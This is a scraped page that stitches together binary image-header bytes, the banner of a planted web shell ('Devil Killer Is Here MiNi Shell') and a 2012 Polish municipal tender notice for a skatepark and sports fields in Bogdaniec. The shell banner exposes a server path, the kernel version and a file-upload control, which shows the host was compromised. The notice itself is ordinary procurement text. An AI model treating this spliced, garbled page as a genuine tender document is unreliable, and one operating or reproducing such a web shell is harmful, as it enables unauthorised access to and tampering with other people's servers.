JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/32250-N-2012.html

<p class="kh_header"><b>Bogdaniec: Budowa zespołu sportowo-rekreacyjnego w Bogdańcu - budowa skateparku i boiska wielofunkcyjnego.</b><br>
<b>Numer ogłoszenia: 32250 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Bogdańcu , ul. Mickiewicza 45, 66-450 Bogdaniec, woj. lubuskie, tel. 095 7510210, faks 095 7510209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> infrastruktura@poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zespołu sportowo-rekreacyjnego w Bogdańcu - budowa skateparku i boiska wielofunkcyjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa zespołu sportowo-rekreacyjnego w Bogdańcu - budowa skateparku i boiska wielofunkcyjnego, w tym:I.	 SKATEPARK.:
1.	Zakres rzeczowy:
Powierzchnia boiska - skateparku - 475,87 m2, powierzchnia zieleni - 1.310,57 m2.
Czworoboczny plac o długości boków 20,31m, 20,15m, 22,86m, 24,25m. 
Nawierzchnia betonowa z betonu B35 zbrojonego włóknami polipropylenowymi grubości 15cm z posypką kwarcową. W nawierzchni należy wykonać dylatacje o wymiarach min. 6x6m. 
Podbudowa: 
	beton B15 - 10cm, 
	folia PE, 
	pospółka - 30cm. 
Beton musi być zdylatowany i zatarty na gładko. Podłoże musi być odporne na pęcznienie i osiadanie. 
Podbudowa musi być wykonana zgodnie ze sztuką budowlaną oraz obowiązującymi przepisami technicznymi i normami. 
Wierzchnia warstwa nie może mieć więcej niż 3mm odchyłki na łacie 5m. 
Boisko należy oddzielić obrzeżami betonowymi 8x30x100cm układanymi na ławie betonowej i podsypce piaskowej. Na powierzchni boiska należy wyprofilować spadki 1%.
Zakres inwestycji obejmuje również rozbiórkę amfiteatru (łącznie z fundamentami) o wymiarach: dł. - 10,26 m, szer. 4,95 m, wys. - 3,34 m. Dach drewniany, ściany murowane z kamienia polnego, scena betonowa.

     2.  Wyposażenie:        (wymiary w cm  dł./szer/wys):
                 a) quarter pipe      -  340x364x150,
                 b) bank ramp        - 416x244x150 ,
                 c) funbox  z manualboxem + poręcz 3/1 -  680x244x45,
                 d) funbox z banana boxerm   -  560x244x45 ,
                 e) poręcz łamana  - profil   -  500x8x30/55,
                 f)  grinbox 9           - 364x131x35 ,
                 g) ławka 1             -  224x30x30 ,
                 h) poll jam             -  60x10x50,
                 i) poręcz C          - profil o  330x5x35
                 j) minirampa H 120  -  885x488x120. 

Wszystkie sklejki użyte do produkcji muszą być laminowane. 
Zaoferowane urządzenia oparte o konstrukcję ze sklejki ciemnej laminowanej i wodoodpornej 18 mm i drewna impregnowanego o odpowiedniej wytrzymałości. 
Boczne panele wykonane ze sklejki ciemnej laminowanej i wodoodpornej 18 mm, powinny mieć system wentylacji umożliwiający swobodny przepływ powietrza przez element. 
Elementy wykonane z modułów nie większych niż 1220 mm, połączonych tak by tworzyć element. 
Wszystkie płyty sklejki wycinane za pomocą maszyn numerycznych CNC. 
Dopuszcza się zastosowanie elementów z tworzywa sztucznego. 
Płyty należy mocować przy pomocy śrub cynkowo - niklowych, śruby nie mogą wystawać ponad płaszczyznę montowanego elementu. 
Element jezdny wykonany ze sklejki wodoodpornej ciemnej laminowanej - wzmocnionej 18mm, na elementach łukowych ze sklejki wodoodpornej ciemnej laminowanej 9mm i 6 mm. 
Wszelkie elementy zabezpieczające krawędzie oraz copingi i barierki wykonać ze stali galwanizowanej lub nierdzewnej. 
Wszystkie załamania na bankach i funboxach należy zabezpieczyć blachą gr. min. 3 mm. 
Blachy na zjazdach montowane pod kątem mniejszym niż 15 stopni, szerokość minimalna 30 cm, grubość blachy ocynkowanej min. 3 mm. 
Barierki ochronne wykonane ze stali ocynkowanej. 
Minimalny promień quarterów i ramp 190 cm. 
Urządzenia muszą być odizolowane od podłoża za pomocą podstawek. 
Dopuszcza się zmianę wymiarów długości urządzeń o 6%. 
Wykonawca udzieli co najmniej trzyletniej gwarancji na konstrukcję urządzeń i elementy metalowe oraz co najmniej rocznej na elementy jezdne. 
Urządzenia powinny być wykonane według normy PN-EN 14974. 

3.Tereny zielone: 
Tereny wokół projektowanego boiska w pasie 1-4m oraz po rozbiórce amfiteatru należy zrekultywować i obsiać trawą. 
Nawierzchnię należy wykonać wg następującej technologii: 
	-   dodanie humusu i piasku, 
	-  wymieszanie gleby glebogryzarką 
	-  wyrównanie, 
	-  zwałowanie, 
	-  obsianie trawą specjalistycznym siewnikiem 
	-  do czasu pierwszego koszenia - wykonywanie pielęgnacji. 
Poziomy nawierzchni terenu należy dopasować do projektowanego boiska - skateparku.

II.	BOISKO WIELOFUNKCYJNE:

1.	 Zakres rzeczowy:
              -  budowa boiska sportowego o zakresie:
                          -  powierzchnia boiska wielofunkcyjnego -  534,71 m2,
              -  powierzchnia boiska  do piłki nożnej - 4.979,28 m2,
              -  powierzchnia bieżni  - 504,81 m2,
              -  powierzchnia skoczni do skoku w dal - 87,15 m2,
                     - powierzchnia trybun  - 301,71 m2,
              - ogrodzenie z siatki stalowej ocynkowanej - L = 125 m.

2.Boisko wielofunkcyjne A. 
Od strony północnej usytuowano boisko wielofunkcyjne o wymiarach 31,16x 17,16m. 
Na boisku wyznaczono: 
	liniami białymi - koszykówkę o zewn. wymiarach 18x28m, 
	liniami niebieskimi - unihokej o zewn. wymiarach 14x28m, 
	liniami żółtymi - siatkówkę o zewn. wymiarach 9x18m, 

W nawierzchni należy wykonać: 
	2 fundamenty do słupów kosza, 
	4 fundamenty do bramek unihokeja, 
	2 fundamentu do słupów siatki. 
Urządzenia będą mocowane na czas gry w tulejach fundamentów. Tuleje wyposażyć w zaślepki. 
Boisko wielofunkcyjne o nawierzchni syntetycznej poliuretanowej grubości 13mm. 
Podbudowa: podbudowa betonowa B20 grubości 15cm, 
	podsypka piaskowa zagęszczona 20cm, grunt rodzimy. 
Nawierzchnia poliuretanowa - w kolorze ceglastym, nieprzepuszczalna dla wody, odporna na kolce i działanie czynników atmosferycznych. 
Warstwy: 
	natrysk z poliuretanu i granulatu EPDM 2-3mm o uziarnieniu 1,5mm 
	szpachla poliuretanowa 
	mata gumowa 10mm 

Boisko należy oddzielić obrzeżami betonowymi 8x30x100cm układanymi na ławie betonowej i podsypce piaskowej. Na powierzchni boiska należy wyprofilować spadki 0,5 do 1%. 
Wyposażenie: 
	2 szt. koszy do koszykówki, 
	2szt. bramek unihokeja, 
	2 szt. słupków stalowych o regulowanej wysokości z mechanizmem naciągowym, 
	siatka całosezonowa 
	bandy przenośne do unihokeja o wysokości 50cm z zaokrąglonymi narożnikami. 

3..Bieżnia B. 
Od strony północnej usytuowano bieżnię o wymiarach 5,04x 100,16m. 
Na bieżni wyznaczono: 
	liniami białymi - 4 tory o szerokości 1,22mi długości 80m, linię startupo 3m i linię mety po 83m oddziela pole mety długości 17m 

Bieżnia o nawierzchni syntetycznej poliuretanowej grubości 13mm. 
Podbudowa: 
	podbudowa betonowa B20 grubości 15cm, 
	podsypka piaskowa zagęszczona 20cm, 
	grunt rodzimy. 

Beton musi być zdylatowany i zatarty na gładko. Podłoże musi być odporne na pęcznienie i osiadanie. 
Podbudowa musi być wykonana zgodnie ze sztuką budowlaną oraz obowiązującymi przepisami technicznymi i normami. 
Wierzchnia warstwa nie może mieć więcej niż 3mm odchyłki na łacie 5m. 
Nawierzchnia poliuretanowa - w kolorze ceglastym, nieprzepuszczalna dla wody, odporna na kolce i działanie czynników atmosferycznych. 
Warstwy: 
	natrysk z poliuretanu i granulatu EPDM 2-3mm o uziarnieniu 1,5mm 
	szpachla poliuretanowa 
	mata gumowa 10mm 
	
4.Skocznia do skoku w dal C. 
Od strony północnej usytuowano skocznię do skoku w dal. 
Wymiary rozbiegu 1,38x40,92m. 
Wymiary zeskoku 8,16x3,76m 
Na rozbiegu zamontować w systemowej skrzyni deskę do skoku w dal 121x34x10cm. 
Belka do skoku w dal wykonana z żywic epoksydowych z nakładką drewnianą od góry, wodoodporna w komplecie z listwą na plastelinę. 
Rozbieg o nawierzchni syntetycznej poliuretanowej grubości 13mm. 
Podbudowa: 
	podbudowa betonowa B20 grubości 15cm, 
	podsypka piaskowa zagęszczona 20cm, 
	grunt rodzimy. 

Beton musi być zdylatowany i zatarty na gładko. Podłoże musi być odporne na pęcznienie i osiadanie. 
Podbudowa musi być wykonana zgodnie ze sztuką budowlaną oraz obowiązującymi przepisami technicznymi i normami. 
Wierzchnia warstwa nie może mieć więcej niż 3mm odchyłki na łacie 5m. 
Nawierzchnia poliuretanowa - w kolorze ceglastym, nieprzepuszczalna dla wody, odporna na kolce i działanie czynników atmosferycznych. 
Warstwy: 
	natrysk z poliuretanu i granulatu EPDM 2-3mm o uziarnieniu 1,5mm
	szpachla poliuretanowa 
	mata gumowa 10mm 

Rozbieg należy oddzielić obrzeżami betonowymi 8x30x100cm układanymi na ławie betonowej i podsypce piaskowej. Na powierzchni należy wyprofilować spadki 1%. 
Zeskok : 
	piasek płukany 0,2mm 50cm, 
	geowłóknina separująca, 
	warstwa kruszywa 8-16mm 20cm 
	grunt rodzimy. 

Zeskok należy oddzielić obrzeżami drewnianymi - deskami z drewna liściastego 8x30cm układanymi na ławie betonowej i podsypce piaskowej. Deski powinny być oszlifowane, zaimpregnowane i malowane farbami do drewna. 

5. Boisko do piłki nożnej D. 
W centralnej części działki zaprojektowano boisko do piłki nożnej o wymiarach 90x 55m. 
Na boisku wyznaczono liniami białymi pola gry. Linie będą wyznaczane w miarę potrzeb posypką do boisk z trawy specjalistycznym wózkiem. 
Nawierzchnię należy wykonać wg następującej technologii: 
	oprysk środkiem chwastobójczym, 
	rekultywacja glebogryzarką, 
	wyrównanie terenu z odchyłkami nie większymi niż 2cm na 4 metrowej łacie, pomiar miarą laserową, 
	pobranie próbek gleby i oddanie do analizy stacji chemiczno-rolniczej, 
	doprowadzenie gleby do stanu zalecanego przez stację chemiczno-rolniczą, 
	dodanie humusu i piasku - wg wytycznych ww stacji, 
	wymieszanie gleby glebogryzarką 
	ponowne wyrównanie z odchyłkami nie większymi niż 2cm na 4 metrowej łacie, pomiar miarą laserową, 
	zwałowanie, 
	obsianie trawą specjalistycznym siewnikiem 
	do czasu pierwszego koszenia - wykonywanie pielęgnacji. 

Nawierzchnia boiska - płaska. Dopuszcza się wykonanie spadków od środka na zewnątrz boiska w 4 kierunkach o nachyleniu ok. 0,5%. 
W nawierzchni należy wykonać:  -   4 fundamenty do bramek piłki nożnej, 
Wyposażenie:      -   2 szt. bramek do piłki nożnej, 
	     -   urządzenie jezdne do nawadniania specjalistyczny pojazd, 
Bramki do piłki nożnej o wymiarach 7,32x2,44m w kolorze białym. Siatki do bramek w kolorze białym. Bramki muszą być przystosowane do rozgrywek na obiektach zewnętrznych, całoroczna, odporna na warunki atmosferyczne. 

6.Trybuny E,F. 
Od strony południowej na istniejącej skarpie zaprojektowano 2 trybuny (jednakowe), trzyrzędowe, dwusektorowe. 
Schody betonowe na gruncie z betonu B35 zbrojone siatką stalową 8x15x15. 
Murki trybun prefabrykowane z betonu B35 zbrojone siatką stalową 8x15x15. 
Nawierzchnie z kostki betonowej szarej prostokątnej wzór jak na istniejącym chodniku od strony zachodniej boiska. 
Podbudowa:  podsypka cementowo - piaskowa 5cm, 
	warstwa odsączająca z pospółki min. 10cm, 
	grunt rodzimy. 

Nawierzchnie należy oddzielić obrzeżami betonowymi 8x30x100cm układanymi na ławie betonowej i podsypce piaskowej. Na powierzchni należy wyprofilować spadki 1%. 
Siedziska: 
Ławki z prefabrykowanych elementów żelbetowych, z deskami dębowymi o przekroju 6x12cm, impregnowanymi, malowanymi farbami do drewna w kolorze ciemny brąz. 
Nawierzchnie betonowe należy wymalować impregnatem do betonu. 
Elementy betonowe zakryte gruntem należy 2x zailozować środkiem bitumicznym, np. dysperbitem lub abizolem r+p lub innym równoważnym. 
W trybunie E pozostawić miejsce na istniejącą latarnię oświetleniową - wg wytycznych inwestora lampy mają pozostać bez zmian. 
Przy zewnętrznych schodach na trybuny E i F należy zamontować stalowe poręcze o wysokości 1,1m, ocynkowane i powlekane proszkowo w kolorze ciemny brąz. 

7.Ogrodzenie. 
Od strony północnej projektowanych boisk na skarpie należy wykonać ogrodzenie, wg rysunku. Projektowane ogrodzenie ma być kontynuacją istniejącego ogrodzenia usytuowanego wzdłuż ul. Pocztowej oraz w tym samum wzorze i kolorze. 
Ogrodzenie na cokole betonowym z betonu B25 szerokości 25cm i podsypce piaskowej. 
Cokół betonowy należy wymalować impregnatem do betonu. 
Elementy betonowe zakryte gruntem należy 2x zaizolować środkiem bitumicznym, np. dysperbitem lub abizolem r+p lub innym równoważnym.  
Słupki stalowe ocynkowane 4x4 cm
Przęsła z siatki stalowej ocynkowanej - we wzorze i wielkości jak istniejące ogrodzenie.

8.Tereny wokół boisk. 
Tereny wokół boisk w granicach opracowania należy zrekultywować i obsiać trawą. 
Nawierzchnię należy wykonać wg następującej technologii: - oprysk środkiem chwastobójczym, 
                             -rekultywacja glebogryzarką, 
                            - wyrównanie terenu, 
	     - dodanie humusu i piasku, 
	     - wymieszanie gleby glebogryzarką 
	     - ponowne wyrównanie, 
	     - zwałowanie, 
	     -  obsianie trawą specjalistycznym siewnikiem 
	do czasu pierwszego koszenia - wykonywanie pielęgnacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniajace zostaną udzielone w przypadku wystapienia konieczności wykonania robót tego samego rodzaju, na które będą środki w budżecie a zamówienie uzupełniające nie przekroczy 50% wartości zamowienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.23.32.00-1, 45.21.22.21-1, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia wadium w wysokosci 25.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykonali w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali jedną robotę budowlaną polegającą na budowie  boiska sportowego o podobnym zakresie jak niniejsze zamówienie, z podaniem miejsca i terminu wykonania, oraz poświadczeniem referencjami lub innymi dokumentami, że roboty te zostały wykonane należycie.
Zamawiajacy oceni spełnienie warunku na podstawie dokumentów/oświadczeń złożonych z ofertą, w skali spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamowiernie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobą posiadajacą uprawnienia budowlane do samodzielnego kierowania, nadzorowania i kontrolowanias budowy i robót w zakresie ogólno-budowlanym.
Zamawiajacy oceni spełnienie warunku na podstawie dokumentów/oświadczeń złożonych z ofertą, w skali spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zaświadczenia właściwego urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS  potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne lub zaświadczenia, że uzyskał zgodę  na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w  
           całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed   
           upływem terminu składania ofert. Dokumenty te muszą złożyć wszyscy wykonawcy 
           wspólnie ubiegający się o przyznanie zamówienia.
       2)Zaświadczenie z banku obsługującego oferenta o posiadaniu dostępu do linii kredytowej lub    
           wolne środki na rachunku bankowym w wysokości nie mniejszej niż 150 tys. PLN.
       3)Polisę ubezpieczenia OC z tytułu prowadzenia działalności na sumę gwarancyjną nie mniejszą niż 1.000.000,00 zł
Zamawiajacy oceni spełnienie warunku na podstawie dokumentów/oświadczeń złożonych z ofertą, w skali spełnia  - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Pełnomocnictwo do podpisywania dokumentów przetargowych i podejmowania zobowiązań przez oferenta w zakresie niniejszego zamówienia.

